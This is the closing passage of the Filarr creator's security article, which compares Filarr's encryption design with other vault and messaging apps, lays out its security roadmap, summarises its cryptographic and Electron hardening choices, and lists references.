Technical choice differences are generally explained by different use cases. Signal has no user password because it's a messaging app where local installation is meant to be fast and friction-free — everything derives from PIN + Secure Value Recovery, a sophisticated protocol storing a master key encrypted version server-side but only the correct PIN decrypts. 1Password has the Secret Key, a 256-bit key the user stores off-server (typically on a printed QR code), which combines with the password to double security. We considered this model for Filarr but the UX degradation (handling an additional file at each new device) was deemed incompatible with the tool's mainstream target — users regularly forgetting their password would also forget their Secret Key, and support cost would exceed security gain for the targeted user base. Bitwarden uses AES-CBC + HMAC-SHA256, a valid authenticated encryption construction but slower than GCM and historically more prone to implementation errors (padding oracle, missing MAC); their Argon2id migration is in progress. Obsidian encrypts nothing by default because their philosophy is maximum portability of notes (Markdown plain text); third-party plugins like Meld Encrypt exist but security then depends on plugin quality. Notion stores everything in cleartext server-side and their privacy policy explicitly authorizes employee data access for "support", placing them in a different category — centralized collaboration tools, not private personal vaults.
15. Security roadmap
What we don't have yet, presented honestly: an independent external security audit is being prepared with a targeted firm (Cure53 or Trail of Bits, depending on availability and budget). The estimated envelope is €15,000 to €30,000 depending on scope — we'll favor wide coverage over extreme depth on a single component. The final report will be made fully public, including findings we'd consider embarrassing, because transparency is the only way to transform an audit into user trust gain.
Authenticode signing for Windows requires an EV (Extended Validation) certificate costing about €400 per year and requiring KYC verification by a CA. It's in progress, but we prioritized runtime hardening first. Without EV signing, SmartScreen shows a warning on first launch that users must click through — it's inelegant but not blocking. Apple notarization for macOS follows a similar path: Developer Program enrollment done, CI automation in progress.
Reproducible builds require a deterministic build environment where compile dates are fixed, file order is stable, and all inputs are under version control. It's a study for v2.4; the main obstacle is that some dependencies (notably argon2 native prebuilds) embed build metadata that varies.
Post-quantum encryption via CRYSTALS-Kyber (standardized in 2024 under ML-KEM by NIST FIPS 203) is on the ideas list for pairing and potentially for long-term blobs. The approach would be hybrid — classical + post-quantum combined — as Signal did with PQXDH in 2023 and WireGuard since its 1.x version. The hybrid allows not betting everything on Kyber (which has been partially cryptanalyzed recently) while gaining resistance against an attacker storing traffic today to decrypt tomorrow with a quantum computer.
An official bug bounty is planned after the external audit — we want to first pay for "easy" findings (those a systematic audit will find) before opening a bounty that would pay for them at public price. Once the base is clean, the bounty makes more sense.
Finally, the custom app:// protocol to replace file:// in production will allow definitively closing the GrantFileProtocolExtraPrivileges fuse and significantly hardening CSP (currently default-src 'self' on file:// has fuzzy semantics; on custom app:// it's clean and strict). The work requires migrating React bundle loading, fonts, pdf.js workers, images, and i18n locales, and testing the full preview chain. Count one to two weeks of work + intensive testing.
All this is publicly documented on the roadmap, not hidden.
16. Summary
If you had to remember only five statements from this article: your content is encrypted with AES-256-GCM using a key only your password can derive via Argon2id and PBKDF2-SHA-512 600,000 iterations, and this key never leaves your machine in cleartext. Filarr's servers technically cannot read your data — not under subpoena, not if their infrastructure is compromised; they only see opaque blobs. Multi-device pairing uses ECDH P-256 and HKDF-SHA-256 with a domain separator so the FEK is exchanged end-to-end without the server being able to reconstruct it. The Electron binary is hardened against all known abuses: 8 explicit fuses with strictlyRequireAllFuses, contextIsolation, Chromium sandbox, strict CSP, IPC allowlist, defensive DOMPurify, and SSRF protection. Dependencies are audited on every release with an April 18, 2026 bilan of zero critical or high runtime vulnerabilities, after 8 internal fixes in v2.2.1 and 18 Electron CVEs fixed in v2.3.0.
Filarr doesn't claim to be perfect. It claims to be explicit: every choice is documented with its exact parameters, every tradeoff is stated, every fixed CVE is dated and referenced. It's up to you to judge whether this architecture matches your threat model — if so, you can download the app, create your first profile, and encrypt your first file in a few minutes. If it doesn't suit you, email contact@filarr.com with [Security] prefix in the subject to tell us what's missing. Response within 48 business hours, and no prosecution of vulnerability researchers acting in good faith (safe harbor).
17. References and further reading
Standards & specifications
- NIST SP 800-38D — Recommendation for Block Cipher Modes of Operation: GCM and GMAC
- NIST SP 800-56C Rev.2 — Recommendation for Key-Derivation Methods in Key-Establishment Schemes
- RFC 5869 — HMAC-based Extract-and-Expand Key Derivation Function (HKDF)
- RFC 8446 — The Transport Layer Security (TLS) Protocol Version 1.3
- RFC 9106 — Argon2 Memory-Hard Function for Password Hashing and Proof-of-Work Applications
- FIPS 203 (ML-KEM) — Module-Lattice-based Key-Encapsulation Mechanism
OWASP
Electron & Chromium
Attacks & research
- Böck, Zauner, Devlin — Nonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS (2016) — the Forbidden Attack
- Bellare & Namprempre — Authenticated Encryption: Relations among Notions and Analysis of the Generic Composition Paradigm (2008)
- MITRE ATT&CK — Enterprise Matrix
- Password Hashing Competition — PHC
Comparables & inspirations
- Signal — Technical Documentation
- 1Password — 1Password Security Design White Paper
- Bitwarden — Security Whitepaper
- ProtonMail — Security Features
- Tresorit — Encryption Whitepaper
Mathis Belouar-Pruvot Filarr creator — filarr.com Last revision: April 18, 2026 (v2.3.1)